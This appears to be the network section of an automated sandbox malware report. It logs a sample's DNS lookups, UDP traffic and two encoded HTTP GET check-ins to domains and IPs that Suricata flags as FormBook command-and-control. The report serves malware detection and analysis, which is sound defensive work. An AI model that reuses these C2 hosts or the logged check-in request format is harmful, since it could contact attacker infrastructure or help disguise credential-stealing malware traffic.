Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.5gusaphones.com | 64.190.62.111 | |
www.drraass.com | 160.121.199.48 | |
UDP Requests
- 192.168.56.102:58318 -> 164.124.101.2:53
- 192.168.56.102:60922 -> 164.124.101.2:53
- 192.168.56.102:63203 -> 164.124.101.2:53
- 192.168.56.102:65038 -> 164.124.101.2:53
- 192.168.56.102:137 -> 192.168.56.255:137
- 192.168.56.102:138 -> 192.168.56.255:138
- 192.168.56.102:65041 -> 239.255.255.250:1900
- 52.231.114.183:123 -> 192.168.56.102:123
HTTP Requests
GET 404 http://www.drraass.com/d6b4/?BZR8DR=ZFjiT42y6P0728e7zdpBA4KxoCmBCCb5Al/LhO89P4sgCaouJTXqFiYZc9VykBwhS3eZep96&VRKt=vBZhY2d0ZnJDbt
REQUEST
GET /d6b4/?BZR8DR=ZFjiT42y6P0728e7zdpBA4KxoCmBCCb5Al/LhO89P4sgCaouJTXqFiYZc9VykBwhS3eZep96&VRKt=vBZhY2d0ZnJDbt HTTP/1.1
Host: www.drraass.com
Connection: close
RESPONSE
HTTP/1.1 404 Not Found
Transfer-Encoding: chunked
Server: Nginx Microsoft-HTTPAPI/2.0
X-Powered-By: Nginx
Date: Mon, 02 Aug 2021 22:53:47 GMT
Connection: close
BODY
GET 0 http://www.5gusaphones.com/d6b4/?BZR8DR=TVsDFMPATNjElIxDQdFdIJ7pI7RNJco0RSJv47bENHhP3SgsFs3eKGTcOpqZrd+87WRONrAg&VRKt=vBZhY2d0ZnJDbt
REQUEST
GET /d6b4/?BZR8DR=TVsDFMPATNjElIxDQdFdIJ7pI7RNJco0RSJv47bENHhP3SgsFs3eKGTcOpqZrd+87WRONrAg&VRKt=vBZhY2d0ZnJDbt HTTP/1.1
Host: www.5gusaphones.com
Connection: close
RESPONSE
HTTP/1.1 200 OK
date: Mon, 02 Aug 2021 22:54:16 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
vary: Accept-Encoding
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_QVQsVd1FupxkeMutiPJLx3cCQO/kYu3ktF5Qg/rIaivyIRgf/fpAdczZALjsWQjxfaP5G/lyxGCah+Q4cfHMuA==
last-modified: Mon, 02 Aug 2021 22:54:16 GMT
x-cache-miss-from: parking-58759dfcb5-fg79f
server: NginX
connection: close
BODY
ICMP Traffic
No ICMP traffic performed.
IRC Traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49165 -> 64.190.62.111:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.102:49165 -> 64.190.62.111:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.102:49165 -> 64.190.62.111:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 160.121.199.48:80 -> 192.168.56.102:49164 | 2400016 | ET DROP Spamhaus DROP Listed Traffic Inbound group 17 | Misc Attack |
TCP 192.168.56.102:49164 -> 160.121.199.48:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.102:49164 -> 160.121.199.48:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.102:49164 -> 160.121.199.48:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS alerts.
Snort Alerts
No Snort alerts.